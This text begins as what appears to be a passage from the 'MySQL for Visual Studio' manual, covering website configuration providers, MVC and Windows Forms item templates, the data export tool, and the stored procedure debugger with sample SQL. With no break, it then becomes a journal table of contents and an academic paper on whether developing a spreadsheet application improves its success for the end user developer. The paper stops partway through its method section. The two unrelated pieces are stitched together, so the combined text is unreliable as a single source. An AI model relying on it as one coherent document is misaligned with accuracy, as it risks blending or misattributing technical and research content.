The MySQL Simple Membership provider handles the website membership tasks with ASP.NET. This provider is a simpler version of the ASP.NET Membership provider, and it can also work with OAuth Authentication. For additional information about using OAuth authentication, see Adding OAuth Authentication to a Project.
The required configuration options for the Simple Membership provider are: a name for the connection string, and a connection string that contains a valid database with a local or remote MySQL server instance, a user table to store the credentials, and column names for the User ID and User Name columns.
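A minimal credentials table matching those options might look like this; the table and column names are assumptions for illustration, not a schema the provider mandates:

```sql
CREATE TABLE users (
  user_id INT NOT NULL AUTO_INCREMENT,  -- mapped to the User ID column option
  user_name VARCHAR(56) NOT NULL,       -- mapped to the User Name column option
  PRIMARY KEY (user_id)
) ENGINE=InnoDB;
```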
Check the Auto Create Tables option to create the required tables when adding the first user to the table. After setting up a membership provider, a new section is added to the web configuration file.
After setting up one of the membership providers, click **Next** to configure the Roles Provider:
Figure 6.8 MySQL Website Configuration Tool - Roles
Again the connection string can be edited, a description added and Autogenerate Schema can be enabled before clicking **Next** to go to the Profiles Provider screen:
Figure 6.9 MySQL Website Configuration Tool - Profiles
This screen displays similar options to the previous screens.
Click **Next** to proceed to the Session State configuration page:
Figure 6.10 MySQL Website Configuration Tool - Session State
Click **Next** to proceed to the Site Map configuration page:
The Site Map provider builds a site map from a MySQL database, and builds a complete tree of the `SitemapNode` objects. It also provides methods so that the generated nodes can be read from the site map.
The required configuration options are a name for the connection string, and a connection string that contains a valid database with a local or remote MySQL server instance.
After setting up the Site Map provider, a new section is added to the web configuration file.
Click **Next** to proceed to the Web Personalization configuration page:
The Web Personalization provider is used when a website application needs to store persistent information for the content and layout of the Web Parts pages that are generated by a Web Parts personalization service. This provider should be used along with the Membership, Roles, and Profiles providers.
The required configuration options are a name for the connection string, and a connection string that contains a valid database with a local or remote MySQL server instance.
After setting up the Personalization provider, a new section is added to the web configuration file.
Once you have set up the optional Web Personalization options, click Finish to exit the wizard.
At this point, set the **Authentication Type** to **From Internet**: launch the **WEBSITE, ASP.NET Configuration** tool, select the **Security** tab, click the **Select authentication type** link, and ensure that the **From the internet** radio button is selected. You can now examine the database you created to store membership information. All the necessary tables will have been created for you:
**Figure 6.15 MySQL Website Configuration Tool - Tables**
Chapter 7 MySQL Project Items
Table of Contents
7.1 Minimum Requirements
7.2 MySQL ASP.NET MVC Items
7.3 MySQL Windows Forms Items
This tutorial uses MySQL MVC Item templates to set up an MVC web application. At the end of the tutorial, a Windows Forms Item with MySQL connectivity will also be created.
7.1 Minimum Requirements
• MySQL 5.5 installed on a host that is accessible.
• MySQL for Visual Studio 1.2.5.
• Visual Studio 2012 (Professional edition).
• MySQL Connector/.NET is required to use web providers in the generated web application.
7.2 MySQL ASP.NET MVC Items
To add a MySQL MVC Item to an existing MVC project, first add a MySQL Entity Framework model. Skip this step if you have already done this.
Configure the project to use MySQL with an Entity Framework. There are two ways to do this:
• Manually add the needed references (EntityFramework, MySql.Data, and MySql.Data.Entity), and add the required configuration to the web.config configuration file.
• Or (preferred), take advantage of the MySQL Website Configuration tool, which configures either Entity Framework 5 or 6 to work with MySQL. For additional information about this tool, see Chapter 6, MySQL Website Configuration Tool.
Once you have configured the project to use MySQL with Entity Framework, proceed to create the model using the standard ADO.NET Entity Data Model wizard. For MySQL MVC Item Templates, you need to add the model under the “Models” folder, as illustrated below:
Figure 7.1 ADO.NET Entity Data Model
The wizard's **Choose Model Contents** step asks what the model should contain. Choose the option that creates an entity model from a database: object-layer code is generated from the model, and this option also lets you specify the database connection, settings for the model, and database objects to include in the model.
Figure 7.2 Choose or create a new MySQL connection
Figure 7.3 Creating a new MySQL connection
After selecting the MySQL connection, you need to select the database objects to include in the model.
**Important**
The **Pluralize or singularize generated object names** option must remain unchecked, otherwise the MySQL MVC Item Template will not function properly.
Figure 7.4 Selecting the database object to include in the model
Click **Finish** to generate the model, as demonstrated below:
Now, generate a new MySQL MVC Item. Right-click on the project, and select Add New Item from the contextual menu.
This launches the Add New Item wizard. The MySQL menu offers two options: MySQL New MVC Item and MySQL New Windows Form. Select MySQL New MVC Item, and then click Add.
This opens the **MVC Item Template** dialog. Now select the MySQL model and entity that you want to use to create the MVC item. The model drop-down list is populated based on all the MySQL Entity Framework models available in the project, and the entities drop-down list is populated with the entities available for the selected model.
After selecting the model and entity to create the item, click **Finish**, and a new controller and view matching the selected entity will be added to the project. These contain the necessary back end code to render the *entity* data.
You can now execute the application. In our example we used the Sakila database and generated an Actor controller:
**Figure 7.11 The Actor View**
The rendered view shows an Actor List table with an **actor_id** column listing the first rows of the actor table (actor_id values 1 through 10).
7.3 MySQL Windows Forms Items
Figure 7.12 MySQL New Windows Form
The procedure for adding a MySQL Windows Forms Item is similar to adding a MySQL MVC Item, with three major differences:
- You can create the MySQL Entity Framework model under the root path of the project.
- When selecting the desired entity, you can also select the layout type in which the new form will display the entity data.
Figure 7.14 The "MySQL Windows Form" Item Template dialog, with the layout options
- A Resources folder is added to the project that contains images used by the icons for the generated form.
Figure 7.15 The Resources Folder and New Form
The new form will have all the necessary back-end code to display the entity data, with the user interface (UI) based on the previously selected layout.
Figure 7.16 The "frmactor" Form in Design Mode
Figure 7.17 The "frmactor" Form to Display Data
Chapter 8 MySQL Data Export Tool
MySQL for Visual Studio has a data export tool that creates a dump file for a MySQL database.
Figure 8.1 MySQL for Visual Studio Data Export Tool: Main Window
Creating a Dump of an existing MySQL Database
To open a new window for the MySQL Data Export tool, create a new connection using the Server Explorer window inside Visual Studio. Once the connection is established, right-click the connection node to open a context menu and choose the MySQL Data Export option. A new tabbed window opens for the current connection. You can select one or more databases to include in the dump.
Follow these steps to create a dump for the MySQL Databases:
1. Select all the databases and their objects to be included in the dump.
2. Select the desired settings for the dump: whether the dump will include the data, whether the insert operations will be logged in extended mode, and so on. The main window of the MySQL Database Export tool shows the basic options for the dump; clicking the Advanced button exposes more specific options.
3. When the selection of the options is done, give a name to the result file that will be created. If no path is given for the result file, the default path to be used is **My Documents** under the user's folder.
4. A filter can be applied on the list of schemas for the selected connection. With it, the user can easily locate the databases to be included in the dump.
Figure 8.6 MySQL for Visual Studio Data Export Tool: Filtering the Schemas
5. After selecting the options and the name for the dump file, the user can click the Export button, which generates the dump.
Each dump can have different settings. After configuring the dump operation, the settings can be saved into a setting file for later use. This file includes: the connection selected, the name of the file for the dump, and the database or databases and the objects selected for dumping. The file extension for the setting file is `.dumps`.
Figure 8.8 MySQL for Visual Studio Data Export Tool: Saving a Setting File
A saved setting file can be loaded into the MySQL Data Export tool by clicking the Load Settings button.
Figure 8.9 MySQL for Visual Studio Data Export Tool: Opening a Setting File
Chapter 9 Using the ADO.NET Entity Framework
ADO.NET Entity Framework provides an Object Relational Mapping (ORM) service, mapping the relational database schema to objects. The ADO.NET Entity Framework defines several layers, which can be summarized as:
- **Logical** - this layer defines the relational data and is defined by the Store Schema Definition Language (SSDL).
- **Conceptual** - this layer defines the .NET classes and is defined by the Conceptual Schema Definition Language (CSDL).
- **Mapping** - this layer defines the mapping from .NET classes to relational tables and associations, and is defined by Mapping Specification Language (MSL).
MySQL Connector/.NET integrates with Visual Studio to provide a range of helpful tools to assist development.
A full treatment of ADO.NET Entity Framework is beyond the scope of this manual. If you are unfamiliar with ADO.NET, review the Microsoft ADO.NET Entity Framework documentation.
Tutorials on getting started with ADO.NET Entity Framework are available. See Tutorial: Using an Entity Framework Entity as a Windows Forms Data Source and Tutorial: Data Binding in ASP.NET Using LINQ on Entities.
Chapter 10 DDL T4 Template Macro
The DDL T4 template macro converts an Entity Framework model to MySQL DDL code. Starting with a blank model, you can develop an entity model in Visual Studio's designer. Once the model is created, you can select the model's properties, and in the Database Script Generation category of the model's properties, the property DDL Generation can be found. Select the value SSDLToMySQL.tt(VS) from the drop-down list.
Figure 10.1 DDL T4 Template Macro - Model Properties
Right-clicking the model design area displays a context-sensitive menu. Selecting Generate Database from Model from the menu displays the Generate Database Wizard. The wizard can then be used to generate MySQL DDL code.
Figure 10.2 DDL T4 Template Macro - Generate Database Wizard
Chapter 11 Debugging Stored Procedures and Functions
The stored procedure debugger provides facilities for setting breakpoints, stepping into individual statements (Step Into, Step Out, Step Over), evaluating and changing local variable values, evaluating breakpoints, and other debugging tasks.
Privileges
At the start of each debug session, the debugger recreates a `serversidedebugger` database on your server. This database tracks the instrumented code and implements the debugging logic for the routine being debugged. Your current connection must have privileges to create that database and its associated stored routines, functions, and tables.
The debugger makes changes behind the scenes to temporarily add instrumentation code to the stored routines that you debug. You must have the ALTER ROUTINE privilege for each stored procedure, function, or trigger that you debug. (Including procedures and functions that are called, and triggers that are fired, by a procedure that you are debugging.)
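For example, a statement along these lines would give a dedicated debugging account the privileges described above (the account name is assumed for illustration; adjust the privilege list and scope to your environment):

```sql
-- Hypothetical debugging account; not from the manual.
-- CREATE lets the debugger recreate the serversidedebugger database,
-- and ALTER ROUTINE lets it instrument the routines being debugged.
GRANT CREATE, CREATE ROUTINE, ALTER ROUTINE, SELECT, INSERT, UPDATE, DELETE
    ON *.* TO 'debug_user'@'localhost';
```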
Starting the Debugger
To start the debugger, follow these steps:
1. In Server Explorer, open a connection to your MySQL server.
2. Expand the Stored Procedures folder. Only stored procedures can be debugged directly. To debug a user-defined function, create a stored procedure that calls the function.
3. Right-click a stored procedure node and choose Debug Routine from the context menu.
Figure 11.1 Choose a Stored Routine to Debug
Usage
At this point, Visual Studio switches to debug mode, opening the source code of the routine being debugged in step mode, positioned on the first statement.
If the initial routine you debug has one or more arguments, a dialog opens with a grid containing a row for each argument and three columns: the argument name, its value (editable), and a check box for setting the argument to NULL. After setting the argument values, press OK to start the debug session, or Cancel to cancel it.
Figure 11.2 Setting Arguments (1 of 2)
How the Debugger Functions
To have visibility into the internal workings of a stored routine, the debugger prepares a special version of the procedure, function, or trigger being debugged, instrumented with extra code to keep track of the current line being stepped into and the values of all the local variables. Any other stored procedures, functions, or triggers called from the routine being debugged are instrumented the same way. The debug versions of the routines are prepared for you automatically, and when the debug session ends (by either pressing F5 or Shift + F5), the original versions of the routines are automatically restored.
A copy of the original version of each instrumented routine (the version without instrumentation) is stored in the AppData\Roaming\MySqlDebuggerCache folder for the current Windows user (the path returned by calling System.Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) in .NET, with MySqlDebuggerCache appended). There is one file for each instrumented routine, named routine_name.mysql. For example, in Windows 7, for a user named fergus, the path is C:\Users\fergus\AppData\Roaming\MySqlDebuggerCache.
Two threads are used, one for the debugger and one for the routine being debugged. The threads run in strict alternation, switching between the debugger and the routine as each statement is executed in the stored routine.
Basic Debugging Operations
The debugger has the same look and feel as the standard Visual Studio debuggers for C#, VB.NET or C++. In particular, the following are true:
Locals and Watches
- To show the Locals tab, choose the menu item Debug, Windows, Locals.
The Locals tab lists all the variables available in the current scope: variables defined with DECLARE at any point in the routine, argument parameters, and session variables that are referenced.
- If the last step operation changes the value of a local, its value will be highlighted in red (until another statement is executed or stepped).
- You can change the value of any local.
- To show the Watch tab, choose the menu item Debug, Windows, Watch.
To define a watch, type any valid MySQL expression, optionally including function calls. If the watch evaluation makes sense in the current context (current stack frame), it will show its value, otherwise it will show an error message in the same row the watch was defined.
- When debugging a trigger, in addition to any locals declared or session variables referenced, the new and old object (when applicable) will be listed. For example in a trigger for INSERT, for a table defined like:
```sql
create table t1( id int, myname varchar( 50 ));
```
the locals will list the extra variables new.id and new.myname. For an UPDATE trigger, you will also get the extra variables old.id and old.myname. These variables from the new and old objects can be manipulated the same way as any ordinary local variable.
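For illustration, a minimal INSERT trigger on t1 that you could step into might look like the following (a hypothetical sketch, not code from the manual):

```sql
-- Fires once per inserted row; the debugger instruments it like a routine.
CREATE TRIGGER t1_bi BEFORE INSERT ON t1
FOR EACH ROW
SET NEW.myname = UPPER( NEW.myname );
```

While stepping through this trigger, the Locals tab lists new.id and new.myname, and their values can be inspected or changed like any other local variable.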
Figure 11.4 Debugging a Trigger
Call Stack
- To show the Call Stack tab, choose the menu item Debug, Windows, Call Stack.
- The Call Stack tab lists one stack frame per routine invocation. The frame with a yellow marker is the current stepping point. Clicking another frame activates the editor tab for that routine's source, highlighting the last statement stepped in green.
Figure 11.5 Call Stack
Stepping
- Stepping of a new routine starts in the first executable instruction (excluding declares, handlers, cursor declarations, and so on).
Figure 11.6 Debug Stepping
```sql
CREATE PROCEDURE `spTest` ()
begin
declare n int;
set n = 1;
while n < 5 do
begin
set n = n + 1;
end;
end while;
end
```
Figure 11.7 Function Stepping (1 of 2)
```sql
CREATE PROCEDURE `SimpleNonScalar`()
begin
update CalcData set z = DoSum( x, y );
end
```
Figure 11.8 Function Stepping (2 of 2): the debugger windows during this session. The Locals window lists each variable's Name, Value, and Type; the Call Stack window lists the Name and Line of each frame (here, SimpleNonScalar).
• To step into the code of a condition handler, the condition must be triggered in the rest of the MySQL routine.
• The next statement to be executed is highlighted in yellow.
• To continue stepping, you can choose between **Step Into** (by pressing **F11**), **Step Over** (by pressing **F10**), or **Step Out** (by pressing **Shift + F11**).
• You can step out of any function, trigger, or stored procedure. Stepping out of the main routine runs it to completion and ends the debug session.
• You can step over stored procedure calls, stored functions, and triggers. (To step over a trigger, step over the statement that would cause the trigger to fire.)
• When stepping into a single statement, the debugger will step into each individual function invoked by that statement and each trigger fired by that statement. The order in which they are debugged is the same order in which the MySQL server executes them.
• You can step into triggers triggered from **INSERT**, **DELETE**, **UPDATE**, and **REPLACE** statements.
• Also, the number of times you enter into a stored function or trigger depends on how many rows are evaluated by the function or affected by the trigger. For example, if you press **F11 (Step Into)** into an **UPDATE** statement that modifies three rows (calling a function for a column in the **SET** clause, thus invoking the function for each of the three rows), you will step into that function three times in succession, once for each of the rows. You can accelerate this debug session by disabling any breakpoints defined in the given stored function and pressing Shift + F11 to step out. In this example, the order in which the different instances of the stored function are debugged is server-specific: the same order used by the current MySQL server instance to evaluate the three function invocations.
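To make the three-row scenario concrete, assume a CalcData table populated like the following (a hypothetical setup consistent with the SimpleNonScalar example above):

```sql
-- Three rows mean the function in the SET clause is invoked three times.
CREATE TABLE CalcData( x INT, y INT, z INT );
INSERT INTO CalcData( x, y, z ) VALUES (1, 2, NULL), (3, 4, NULL), (5, 6, NULL);

-- Pressing F11 (Step Into) on this statement enters DoSum once per row,
-- three times in all, in server-determined order.
UPDATE CalcData SET z = DoSum( x, y );
```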
Breakpoints
• To show the Breakpoints tab, choose the menu item Debug, Windows, Breakpoints.
• The Breakpoints tab will show all the breakpoints defined. From here, you can enable and disable breakpoints one by one or all at once (using the toolbar on top of the Breakpoints tab).
• You can define new breakpoints only in the middle of a debug session. Click in the left gray border of any MySQL editor, or click anywhere in a MySQL editor and press F9. In the familiar Visual Studio way, you press F9 once to create a breakpoint in that line, and press it again to remove that breakpoint.
• Once a breakpoint is defined, it appears to the left of the row as a filled red circle when enabled (the line is a valid statement for a breakpoint) or as an unfilled red circle when disabled (the line is not a valid place for a breakpoint).
• To define conditional breakpoints, after creating the breakpoint, right-click the red dot and choose Condition... There you can enter any valid MySQL expression and state whether the condition is Is True or Has changed. The former triggers the breakpoint every time the condition is true; the latter, every time the condition's value has changed. (With a conditional breakpoint, merely stepping onto the line with the breakpoint is not enough to trigger it.)
Figure 11.9 Conditional Breakpoints
Figure 11.10 Expressions and Breakpoints
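For example, in the spTest routine shown earlier you could put a breakpoint on the `set n = n + 1;` line and give it a condition such as (an illustrative expression, not from the manual):

```sql
-- Any valid MySQL expression over variables in scope can serve as a condition.
n >= 3
```

With Is True selected, the breakpoint fires only on iterations where n is at least 3; with Has changed, it fires when the expression's value changes between evaluations.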
To define pass count breakpoints, after creating the breakpoint, right click in the red dot and choose `Hit Count...`. In the pop-up dialog, define the specific condition to set. For example, `break when the hit count is equal to` and a value 3 will trigger the breakpoint the third time it is hit.
Other Features
- To abort the debug session (and the execution of the current call stack of routines), press `Shift + F5`.
- To run the routine to completion (or until next breakpoint hit), press `F5`.
- For all functionality you can use (in addition to the shortcuts documented), see the options in the `Debug` menu of Visual Studio.
Limitations
- Code being debugged must not use `get_lock` or `release_lock` MySQL functions, since they are used internally by the debugger infrastructure to synchronize the debugger and the debugged routine.
- Code being debugged must avoid using any transaction code (`START TRANSACTION`, `COMMIT`, `ROLLBACK`) due to the possibility of wiping out the contents of the debugger tables. (This limitation may be removed in the future).
- You cannot debug the routines in the `serversidedebugger` database.
- The MySQL server running the routine being debugged can be any MySQL server version after 5.0, and running on any supported platform.
• Always run debug sessions on test and development servers, rather than against a MySQL production server, because debugging can cause temporary performance issues or even deadlocks. The instrumented versions of the routines being debugged use locks that might not pertain to the rest of the production code.
**Keyboard Shortcuts**
The following list summarizes the keyboard shortcuts for debugging:
• **F9**: Toggle a breakpoint
• **F11**: Step into once
• **F10**: Step over once
• **Shift + F11**: Step out once
• **F5**: Run
• **Shift + F5**: Abort current debug session
Appendix A MySQL for Visual Studio Frequently Asked Questions
Questions
• A.1: How do I know if MySQL for Visual Studio is installed?
Questions and Answers
A.1: How do I know if MySQL for Visual Studio is installed?
Open Visual Studio and go to View, Toolbars, and look for (and enable) the MySQL toolbar. Or, open MySQL Installer and look for the MySQL for Visual Studio product.
Editorial Preface
Journal Receives New Name and Expanded Focus
Editor-in-Chief M. Adam Mahmood, University of Texas at El Paso, USA
This preface presents an introduction to the new name and focus of the journal.
RESEARCH PAPERS
Success Factors in the Implementation of a Collaborative Technology and Resulting Productivity Improvements in a Small Business: An Exploratory Study
Nory B. Jones, University of Maine, USA
Thomas R. Kochtanek, University of Missouri, USA
Practitioners and academics often assume that investments in technology will lead to productivity improvement. There is little evidence demonstrating specific, generalizable factors that contribute to these improvements. This qualitative study examined the relationship between four classes of potential success factors on the adoption of a collaborative technology and whether they were related to performance improvements in a small service company.
Organizational Knowledge Sharing in ERP Implementation: Lessons from Industry
Mary C. Jones, University of North Texas, USA
R. Leon Price, University of Oklahoma, USA
This study presents findings about organizational knowledge sharing during ERP implementation in three firms. Data were collected through interviews using a multi-site case study methodology.
The Effect of End User Development on End User Success
Tanya McGill, Murdoch University, Australia
This study investigates the role that developing an end user application plays in the eventual success of the application for the user developer. The results of this study suggest that the process of developing an application not only predisposes an end user developer to be more satisfied with the application than they would be if it were developed by another end user, but also leads them to perform better with it.
The Technology Acceptance Model: A Meta-Analysis of Empirical Findings
Qingxiong Ma, Southern Illinois University, USA
Liping Liu, University of Akron, USA
The technology acceptance model proposes that perceived ease of use and perceived usefulness predict the acceptance of information technology. In this study, the authors conducted a meta-analysis based on 26 selected empirical studies in order to synthesize the empirical evidence.
The Index to Back Issues is available on the WWW at http://www.idea-group.com.
The Effect of End User Development on End User Success
Tanya McGill, Murdoch University, Australia
ABSTRACT
End user development of applications forms a significant part of organizational systems development. This study investigates the role that developing an application plays in the eventual success of the application for the user developer. The results of this study suggest that the process of developing an application not only predisposes an end user developer to be more satisfied with the application than they would be if it were developed by another end user, but also leads them to perform better with it. Thus, the results of the study highlight the contribution of the process of application development to user developed application success.
Keywords: user satisfaction; measuring IS success; user development; end user computing; end users
INTRODUCTION
An end user developer is someone who develops applications systems to support his or her work and possibly the work of other end users. The applications developed are known as user developed applications (UDAs). So, while the technical abilities of user developers may vary considerably, they are basically required to analyze, design and implement applications. End user development of applications forms a significant part of organizational systems development, with the ability to develop small applications forming part of the job requirements for many positions (Jawahar & Elango, 2001). In a survey to determine the types of applications developed by end users, Rittenberg and Senn (1990) identified over 130 different types of applications. Over half of these were accounting related, but marketing, operations and human resources applications were also heavily represented. The range of tasks for which users develop applications has expanded as the sophistication of both software development tools and user developers has increased, and this has led to a degree of convergence with corporate computing, so that the tasks for which UDAs are developed are less distinguishable from tasks for corporate computing applications (McLean, Kappelman, & Thompson, 1993). In addition to the traditional tasks that UDAs have been developed to support, Web applications are becoming increasingly common (Nelson & Todd, 1999; Ouellette, 1999).
Much has been written in the end user computing literature about the potential benefits and risks of end user development. It has been suggested that end user development offers organizations better and more timely access to information, improved quality of information, improved decision making, reduced application development backlogs and improved information systems department/user relationships (Brancheau & Brown, 1993; Shayo, Guthrie, & Igbaria, 1999). In the early UDA literature, the proposed benefits of UDA were seen to flow mainly from a belief that the user has a superior understanding of the problem to be solved by the application (Amoroso, 1988). This superior understanding should then enable end users to identify information requirements more easily and to thus create applications that provide information of better quality. This in turn should lead to better decision making. Other proposed benefits should also flow from this: user development of applications should allow the information systems staff to focus more on the remaining, presumably larger, requests and hence to reduce the application development backlog. This, in turn, should improve relationships between information systems staff and end users.
Despite the potential benefits to an organization of user development of applications, there are many risks associated with it that may lead to potentially dysfunctional consequences for the organization’s activities. These risks result from a potential decrease in application quality and control as individuals with little information systems training take responsibility for developing and implementing systems of their own making (Cale, 1994), and include ineffective use of monetary resources, threats to data security and integrity, solving the wrong problem (Alavi & Weiss, 1985-1986), unreliable systems, incompatible systems, and use of private systems when organizational systems would be more appropriate (Brancheau & Brown, 1993).
As end user development forms a large proportion of organizational systems development, its success is of great importance to organizations. The decisions made by end users using UDAs influence organizational performance every day. Organizations carry out very little formal assessment of fitness for use of UDAs (Panko & Halverson, 1996); they therefore have to rely very heavily on the judgment of end users, both those who develop the applications and others that may use them, as end user developers are not the only users of UDAs. Bergeron and Berube (1988) found that 44% of the end user developers in their study had developed applications that were used by more than two people, and Hall (1996) found that only 17% of the spreadsheets contributed by participants in her study were solely for the developer’s own use. Therefore, it is essential that more is known about UDA success, including whether end users are disadvantaged when they use applications developed by other end users. This paper explores the contribution of the development process to UDA success, and hence highlights differences between the success of UDAs when used by the developer and when used by other end users.
The literature on user participation and involvement proposes benefits that are thought to accrue from greater inclusion of users in the system development process. The benefits that have been proposed include higher levels of information system usage, greater user acceptance of systems and increased user satisfaction (Lin & Shao, 2000). The end user’s superior knowledge of the problem to be solved is certainly one factor influencing these benefits, but the process of participating per se is also thought to have benefits. Those who have participated in systems development have a greater understanding of the functionality of the resulting application (Lin & Shao, 2000) and a greater sense of involvement with it (Barki & Hartwick, 1994), and hence a greater commitment to making it successful. User development of applications has been described as the ultimate user involvement (Cheney, Mann, & Amoroso, 1986). It could thus be expected to lead to systems that gain the benefit of a better understanding of the problem, and to end users with a better understanding of the application and greater commitment to making it work.
This study was designed to isolate the effect of actually developing a UDA on the application’s eventual success for the user developer, and to measure that success in terms of a range of possible success measures. There has been little empirical research on user development of applications (Shayo et al., 1999), and most of what has been undertaken has used user satisfaction as the measure of success because of the lack of direct measures available (Etezadi-Amoli & Farhoomand, 1996). User satisfaction refers to the attitude or response of an end user towards an information system. While user satisfaction has been the most widely reported measure of success (Gelderman, 1998), there have been concerns about its use as the major measure of information systems success (e.g., Etezadi-Amoli & Farhoomand, 1996; Galletta & Lederer, 1989; Melone, 1990; Thong & Chee-Sing, 1996).
The appropriateness of user satisfaction as a measure of system effectiveness may be even more questionable in the UDA domain. Users who assess their own computer applications may be less able to be objective than users who assess applications developed by others (McGill, Hobbs, Chan, & Khoo, 1998). The actual development of an application, which may involve a significant investment of time and creative energy, may be satisfying other needs beyond the immediate task. User satisfaction with a UDA could therefore reflect satisfaction with the (highly personal) development process as much as with the application itself.
Other proposed measures of information systems success that might be appropriate for UDAs include: system quality, information quality, involvement, use, individual impact, and organizational impact (DeLone & McLean, 1992; Seddon, 1997). System quality refers to the quality of an information system (as opposed to the quality of the information it produces). It is concerned with issues such as reliability, maintainability, ease of use, etc. As this study relates to the success of a UDA for the eventual user, the user’s perception of system quality is considered important. Information quality relates to the characteristics of the information that an information system produces. It includes issues such as timeliness, accuracy, relevance and format. As discussed above, improved information quality has been proposed as one of the major benefits of user development of applications.
Involvement is defined as “a subjective psychological state, reflecting the importance and personal relevance of a system to the user” (Barki & Hartwick, 1989, p. 53). Seddon and colleagues (Seddon, 1997; Seddon & Kiew, 1996) included involvement in their extensions to DeLone and McLean’s (1992) model of information systems success. Use refers to how much an information system is used. It has been widely used as a measure of organizational information systems success (e.g., Gelderman, 1998; Kim, Suh, & Lee, 1998), but is only considered appropriate if use of a system is not mandatory (DeLone & McLean, 1992).
Individual impact refers to the effect of an information system on the behavior or performance of the user. DeLone and McLean (1992) claimed that individual impact is the most difficult information systems success category to define in unambiguous terms. For example, the individual impact of a UDA could be related to a number of measures such as impact on performance, understanding, decision making or motivation. Organizational impact refers to the effect of an information system on organizational performance. According to DeLone and McLean’s model, the impact of an information system on individual performance should have some eventual organizational impact. However, the relationship between individual impact and organizational impact is acknowledged to be complex. Organizational impact is a broad concept, and there has been a lack of consensus about what organizational effectiveness is and how it should be measured (Thong & Chee-Sing, 1996). DeLone and McLean (1992, p. 74) recognized that difficulties are involved in “isolating the effect of the I/S effort from the other effects which influence organizational performance”. Again, this issue is likely to be magnified in the UDA domain, where system use may be very local in scope.
The fact that vital organizational decision making relies on the individual end user’s perception of fitness for use suggests that more insight is needed into the role of application development in the success of applications, and that as well as user satisfaction, additional measures of success should be considered. This paper reports on a study designed to address this need by considering a range of both perceptual and direct measures of UDA success in the same study, and isolating the role that actually developing an application plays in the eventual success of the application.
**RESEARCH QUESTIONS**
The primary research question investigated in this study was:
*Does the process of developing an application enhance the success of that application for the user developer?*
In order to isolate the effect of actually developing an application on its success for the user, this study compares end user developers using applications they have developed themselves, with end users using applications developed by another end user, on a number of key variables that have been considered in the information systems success literature. Spreadsheets are the most commonly used tool for end user development of applications (Taylor, Moynihan & Wood-Harper, 1998). Therefore, in this study a decision was made to focus on end users who develop and use spreadsheet applications.
In a study that investigated the ability of end users to assess the quality of applications they develop, McGill (2002) found significant differences between the system
quality assessments of end user developers and independent expert assessors. In particular, the results suggested that end users with little experience might erroneously consider the applications they develop to be of high quality. If this is the case, then end user developers may also consider their applications to be of higher quality than do other users. It was therefore hypothesized that:
H1: End user developers will perceive applications they have developed themselves to be of higher system quality than applications developed by another end user with a similar level of spreadsheet knowledge.
Doll and Torkzadeh (1989) found that end user developers had much higher levels of involvement with applications than did users who were involved in the development process, but where the application was primarily developed by a systems analyst or by another end user. It was therefore hypothesized that:
H2: End user developers will have higher levels of involvement with applications they have developed themselves than with applications developed by another end user with a similar level of spreadsheet knowledge.
End user developers have been found to be more satisfied with applications they have developed themselves than with applications developed by another end user (McGill et al., 1998), or with applications developed by a systems analyst (despite involvement in the systems development process) (Doll & Torkzadeh, 1989). It was therefore hypothesized that:
H3: End user developers will have higher levels of user satisfaction when using applications they have developed themselves than when using applications developed by another end user with a similar level of spreadsheet knowledge.
Increased user satisfaction has been shown to be associated with increased individual impact (Etezadi-Amoli & Farhoomand, 1996; Gatian, 1994; Gelderman, 1998; Igbaria & Tan, 1997). As end user developers are believed to be more satisfied with applications they have developed than are other users of these applications, it is to be expected that they will also perceive that these applications have a greater impact on their work. Therefore it was hypothesized that:
H4: End user developers will have higher levels of perceived individual impact when using applications they have developed themselves than when using applications developed by another end user with a similar level of spreadsheet knowledge.
As previously discussed, the end user computing literature has claimed that end user development leads to more timely access to information, improved quality of information and improved decision making (Brancheau & Brown, 1993; Shayo et al., 1999). While this may be partially due to end users having a better understanding of the problems to be solved by information systems (Amoroso, 1988), the actual process of developing an application may also lead to benefits resulting from a superior knowledge of the application. It was hence hypothesized that:
H5: End user developers will make more accurate decisions when using applications they have developed themselves than when using applications developed by another end user with a similar level of spreadsheet knowledge.
H6: End user developers will make faster decisions when using applications they have developed themselves than when using applications developed by another end user with a similar level of spreadsheet knowledge.
METHOD
Participants
The target population for this study was end users who develop their own applications using spreadsheets. In order to obtain a sample of end user developers with a wide range of backgrounds, participants were recruited for the study in a variety of ways. It was recognized that the time required for participation (see below) would make recruitment difficult, so participants were offered a one-hour training course entitled “Developing Spreadsheet Applications” as an incentive. This session focused on spreadsheet planning, design and testing. They were also given $20 to compensate them for parking costs, petrol and inconvenience. Recruitment occurred first through a number of advertisements placed in local newspapers calling for volunteers; these were followed by e-mails to three large organizations that had expressed interest in the study, and finally word of mouth brought forth some additional participants. The criterion for inclusion in the study was previous experience using Microsoft Excel. While essentially a convenience sample, the participants covered a broad spectrum of ages, spreadsheet experience and training.
Procedure
Fourteen separate experimental sessions of approximately four hours were held over a period of five months. Each session involved between seven and 17 participants (depending on availability) and a total of 159 end users participated overall. Each experimental session consisted of four parts (see Table 1). The study used a within-subjects research design as this has been shown to provide superior control for individual subject differences (Maxwell & Delaney, 1990).
In Part 1 participants were asked to complete a questionnaire to provide demographic information about themselves and information about their background with computers and spreadsheets. The questionnaire also tested their knowledge of spreadsheets. They were not told the objective of the study.
In Part 2 the participants were given a problem statement and asked to develop a spreadsheet to solve it using Microsoft Excel. The problem related to making
Table 1: Experimental session outline
<table>
<thead>
<tr>
<th>Part</th>
<th>Activities</th>
<th>Approx. Duration</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Collect background information and assess spreadsheet knowledge</td>
<td>30 minutes</td>
</tr>
<tr>
<td>2</td>
<td>Develop spreadsheets (see Appendix 1 for the problem statement)</td>
<td>1.5 hours</td>
</tr>
<tr>
<td>3</td>
<td>Use spreadsheets to answer decision questions and complete perceived system quality, involvement, user satisfaction and perceived individual impact questions (see Appendix 2 for the questionnaire items)</td>
<td>1 hour</td>
</tr>
<tr>
<td>4</td>
<td>Training session</td>
<td>1 hour</td>
</tr>
</tbody>
</table>
choices between car rental companies (see Appendix 1 for the problem statement). Participants were provided with blank paper to use for planning if they wished, but were otherwise left to develop the application as they saw fit. They were encouraged to treat the development exercise as they would a task at work, rather than as a test. Participants could use on-line help or ask for technical help from the two researchers present in the laboratory during each session.
Once all participants in the session had completed their spreadsheet, they undertook Part 3 of the session. Each participant was given a floppy disk containing both the spreadsheet they had developed and a spreadsheet from another participant in the session. Matching of participants was done on the basis of the spreadsheet knowledge scores from Part 1, in the expectation that participants with a similar level of spreadsheet knowledge would develop spreadsheets of similar sophistication.
